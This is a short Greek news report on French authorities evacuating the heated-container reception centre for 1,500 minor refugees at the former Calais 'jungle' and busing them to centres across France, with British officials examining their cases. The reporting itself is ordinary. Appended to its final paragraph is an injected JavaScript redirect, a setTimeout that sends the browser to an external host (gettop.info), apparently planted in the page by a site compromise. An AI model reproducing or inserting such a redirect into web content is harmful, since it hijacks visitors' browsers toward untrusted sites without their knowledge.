Εκκενώνεται το κέντρο ανήλικων προσφύγων στην πρώην «ζούγκλα» του Καλαί

0
7

 

Σήμερα άρχισαν οι γαλλικές Αρχές να εκκενώνουν το κέντρο υποδοχής όπου διαμένουν 1.500 ανήλικοι πρόσφυγες στην πρώην «ζούγκλα» του Καλαί. Τρία λεωφορεία έφυγαν από το κέντρο αυτό, που αποτελείται από θερμαινόμενα κοντέινερ τα οποία είχαν τοποθετηθεί κοντά στη μεγαλύτερη παραγκούπολη της Γαλλίας.

Περίπου 30 λεωφορεία θα χρησιμοποιηθούν για τη μεταφορά των ανηλίκων σε 60 ειδικά κέντρα υποδοχής σε όλη τη Γαλλία. Οι ανήλικοι πρόσφυγες δεν επιλέγουν τον προορισμό τους, αλλά μπορούν να επιλέξουν με ποιον θέλουν να ταξιδέψουν και με ποιον θέλουν να μείνουν στο κέντρο. Ενημερώθηκαν χθες Τρίτη για την επιχείρηση μεταφοράς τους με ανακοίνωση της νομαρχίας, η οποία εκδόθηκε σε εννέα γλώσσες.

Η μεγάλη πλειονότητα των ανηλίκων επιθυμούν να πάνε στη Βρετανία. Εκπρόσωποι των βρετανικών αρχών θα τους συνοδέψουν είτε ακολουθώντας τους με αυτοκίνητο είτε ευρισκόμενοι μέσα στα λεωφορεία για να εξετάσουν την υπόθεση του κάθε ένα ξεχωριστά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here